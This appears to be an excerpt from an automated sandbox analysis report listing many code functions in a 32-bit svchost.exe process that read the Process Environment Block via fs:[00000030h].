Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h]	2_2_03C663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]	2_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]	2_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]	2_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]	2_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]	2_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]	2_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]	2_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]	2_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]	2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]	2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]	2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h]	2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]	2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]	2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]	2_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h]	2_2_03CD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D0634F mov eax, dword ptr fs:[00000030h]	2_2_03D0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]	2_2_03CD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]	2_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]	2_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]	2_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]	2_2_03C2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]	2_2_03C50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]	2_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D08324 mov ecx, dword ptr fs:[00000030h]	2_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]	2_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]	2_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D062D6 mov eax, dword ptr fs:[00000030h]	2_2_03D062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]	2_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]	2_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]	2_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]	2_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]	2_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]	2_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]	2_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]	2_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]	2_2_03C402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]	2_2_03C402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h]	2_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h]	2_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D0625D mov eax, dword ptr fs:[00000030h]	2_2_03D0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h]	2_2_03C2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h]	2_2_03C36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]	2_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]	2_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]	2_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]	2_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]	2_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h]	2_2_03C2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h]	2_2_03C2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h]	2_2_03D061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h]	2_2_03C601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h]	2_2_03C70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]	2_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]	2_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]	2_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]	2_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]	2_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]	2_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]	2_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]	2_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]	2_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]	2_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]	2_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]	2_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]	2_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]	2_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]	2_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]	2_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]	2_2_03C2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]	2_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]	2_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]	2_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]	2_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]	2_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]	2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]	2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]	2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]	2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]	2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]	2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]	2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]	2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]	2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]	2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]	2_2_03CF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]	2_2_03C60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]	2_2_03CB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_03C2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]	2_2_03C380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]	2_2_03CB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_03C2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]	2_2_03C720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]	2_2_03C3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C280A0 mov eax, dword ptr fs:[00000030h]	2_2_03C280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]	2_2_03CC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]	2_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]	2_2_03C32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]	2_2_03CB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]	2_2_03C5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]	2_2_03CB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]	2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]	2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]	2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]	2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]	2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]	2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]	2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]	2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]	2_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]	2_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]	2_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]	2_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]	2_2_03C2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]	2_2_03C2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h]	2_2_03CC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]	2_2_03CB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]	2_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]	2_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]	2_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]	2_2_03CBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]	2_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]	2_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h]	2_2_03CD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]	2_2_03C307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h]	2_2_03CE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]	2_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]	2_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]	2_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]	2_2_03C30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h]	2_2_03CBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]	2_2_03C72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]	2_2_03C72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]	2_2_03CB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]	2_2_03C38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]	2_2_03C6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]	2_2_03C30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]	2_2_03C60710
